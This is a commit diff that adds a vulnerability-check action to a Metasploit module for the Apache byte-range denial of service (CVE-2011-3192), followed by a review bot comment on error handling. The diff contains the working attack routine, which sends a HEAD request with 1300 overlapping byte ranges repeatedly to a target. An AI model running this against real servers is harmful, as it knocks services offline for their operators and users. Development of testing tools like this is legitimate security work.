
Lands #1169 - Adds a check

[Closes #1169]

Conflicts:
	modules/auxiliary/dos/http/apache_range_dos.rb
2 parents dfff20a + 882b084 commit a09b3b80239743d89ca85f496c88e3e7ecaffee2 @wchen-r7 wchen-r7 committed Apr 22, 2013
Showing with 67 additions and 14 deletions.
  1. +67 −14 modules/auxiliary/dos/http/apache_range_dos.rb
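--- a/modules/auxiliary/dos/http/apache_range_dos.rb
+++ b/modules/auxiliary/dos/http/apache_range_dos.rb
@@ -9,7 +9,10 @@
 class Metasploit3 < Msf::Auxiliary
- include Msf::Exploit::Remote::Tcp
+ include Msf::Exploit::Remote::HttpClient
+ include Msf::Auxiliary::WmapScanFile
+ include Msf::Auxiliary::Scanner
+ include Msf::Auxiliary::Report
 include Msf::Auxiliary::Dos
 def initialize(info = {})
@@ -24,45 +27,95 @@ def initialize(info = {})
 'Author' =>
 [
 'Kingcope', #original discoverer
- 'Masashi Fujiwara' #metasploit module
+ 'Masashi Fujiwara', #metasploit module
+ 'Markus Neis <markus.neis[at]gmail.com>' # check for vulnerability
 ],
 'License' => MSF_LICENSE,
+ 'Actions' =>
+ [
+ ['DOS'],
+ ['CHECK']
+ ],
+ 'DefaultAction' => 'DOS',
 'References' =>
 [
 [ 'BID', '49303'],
 [ 'CVE', '2011-3192'],
 [ 'EDB', '17696'],
 [ 'OSVDB', '74721' ],
 ],
- 'DisclosureDate' => 'Aug 19 2011'))
+ 'DisclosureDate' => 'Aug 19 2011'
+ ))
 register_options(
 [
 Opt::RPORT(80),
 OptString.new('URI', [ true, "The request URI", '/']),
- OptInt.new('RLIMIT', [ true, "Number of requests to send", 50])
+ OptInt.new('RLIMIT', [ true, "Number of requests to send",50])
 ], self.class)
 end
- def run
+ def run_host(ip)
+
+ case action.name
+ when 'DOS'
+ conduct_dos()
+
+ when 'CHECK'
+ check_for_dos()
+ end
+
+ end
+
+ def check_for_dos()
+ path = datastore['URI']
+ begin
+ res = send_request_cgi({
+ 'uri' => path,
+ 'method' => 'HEAD',
+ 'headers' => {
+ "HOST" => "Localhost",
+ "Request-Range" => "bytes=5-0,1-1,2-2,3-3,4-4,5-5,6-6,7-7,8-8,9-9,10-10"
+ }
+ })
+
+ if (res and res.code == 206)
+ print_status("Response was #{res.code}")
+ print_status("Found Byte-Range Header DOS at #{path}")
+
+ report_note(
+ :host => rhost,
+ :port => rport,
+ :data => "Apache Byte-Range DOS at #{path}"
+ )
+
+ else
+ print_status("#{rhost} doesn't seem to be vulnerable at #{path}")
+ end
+
+ rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
+ rescue ::Timeout::Error, ::Errno::EPIPE
+ end
+ end
+
+
+ def conduct_dos()
 uri = datastore['URI']
+ rhost = datastore['RHOST']
 ranges = ''
 for i in (0..1299) do
 ranges += ",5-" + i.to_s
 end
 for x in 1..datastore['RLIMIT']
 begin
- connect
 print_status("Sending DoS packet #{x} to #{rhost}:#{rport}")
+ res = send_request_cgi({
+ 'uri' => uri,
+ 'method' => 'HEAD',
+ 'headers' => {
+ "HOST" => rhost,
+ "Range" => "bytes=0-#{ranges}"}},1)
- sploit = "HEAD " + uri + " HTTP/1.1\r\n"
- sploit << "Host: " + rhost + "\r\n"
- sploit << "Range: bytes=0-" + ranges + "\r\n"
- sploit << "Accept-Encoding: gzip\r\n"
- sploit << "Connection: close\r\n\r\n"
-
- sock.put(sploit)
- disconnect
 rescue ::Rex::ConnectionRefused
 print_status("Unable to connect to #{rhost}:#{rport}.")
 rescue ::Errno::ECONNRESET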
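Review bot: In `check_for_dos` both `rescue` clauses have empty bodies, so a refused, unreachable or timed-out connection prints nothing and the operator cannot tell a check that never completed from a host that was actually tested. Merge them into one clause that reports the failure, e.g. `rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Timeout::Error, ::Errno::EPIPE => e` followed by `print_error("#{rhost}:#{rport} - check did not complete (#{e.class})")`. The `report_note` call also passes no `:type`; as far as I recall the database layer requires a note type and raises when it is missing, which none of these clauses would catch, so add one (placeholder: `:type => '<note-type>'`). Separately, the probe sends a fixed `"HOST" => "Localhost"` header, so on name-based virtual hosts the answer may come from the default site rather than the one being assessed. A single 206 is therefore better reported as "appears vulnerable" than as "Found".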
